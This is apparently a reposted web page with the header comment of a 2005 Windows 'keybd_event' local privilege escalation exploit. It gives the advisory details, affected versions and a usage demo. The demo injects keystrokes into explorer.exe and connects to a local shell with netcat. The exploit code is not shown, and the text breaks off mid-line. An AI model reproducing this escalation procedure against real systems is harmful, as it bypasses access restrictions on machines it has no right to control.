zoukankan      html  css  js  c++  java
  • Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

    文章整理:天天安全网   作者:佚名   发布时间:2005-09-09

    漏洞资料:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
    危险程度:中等
    影响范围:Microsoft Windows 2000/XP/2003
    解决办法:暂时没有解决方案

    ------------------------------------------------------------------------------

    /*
    * Microsoft Windows keybd_event validation vulnerability.
    * Local privilege elevation
    *
    * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
    * I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
    *
    * Platforms afected/tested:
    *
    * - Windows 2000
    * - Windows XP
    * - Windows 2003
    *
    *
    * Original Advisory: http://www.haxorcitos.com
    * http://www.reversing.org
    *
    * Exploit Date: 08 / 06 / 2005
    *
    * Orignal Advisory:
    * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
    * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
    * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
    *
    * Attack Scenario:
    *
    * a) An attacker who gains access to an unprivileged shell/application executed
    * with the application runas.
    * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
    *
    * Impact:
    *
    * Due to an invalid keyboard input validation, its possible to send keys to any
    * application of the Desktop.
    * By sending some short-cut keys its possible to execute code and elevate privileges
    * getting loggued user privileges and bypass runas/service security restriction.
    *
    * Exploit usage:
    *
    * C:/>whoami
    * AQUARIUS/Administrador
    *
    * C:/>runas /user:restricted cmd.exe
    * Enter the password for restricted:
    * Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
    *
    *
    * Microsoft Windows 2000 [Version.00.2195]
    * (C) Copyright 1985-2000 Microsoft Corp.
    *
    * C:/WINNT/system32>cd /
    *
    * C:/>whoami
    * AQUARIUS/restricted
    *
    * C:/>tlist.exe |find "explorer.exe"
    * 1140 explorer.exe Program Manager
    *
    * C:/>c:/keybd.exe 1140
    * HANDLE Found. Attacking =)
    *
    * C:/>nc localhost 65535
    * Microsoft Windows 2000 [Versi

  • 相关阅读:
    php读取excel日期类型数据的例子
    asp.net字符串分割函数用法
    asp.net页面与页面之间传参数值
    css3中定义required,focus,valid和invalid样式
    java写入文件的几种方法小结
    php file_get_contents与curl性能比较
    Jquery库及其他库之间的$命名冲突解决办法
    [转]DOS特殊字符转义方法
    [转]删除SQL Server Management Studio中保存的帐户信息
    Jpeg2000 简介
  • 原文地址:https://www.cnblogs.com/AloneSword/p/2237664.html
Copyright © 2011-2022 走看看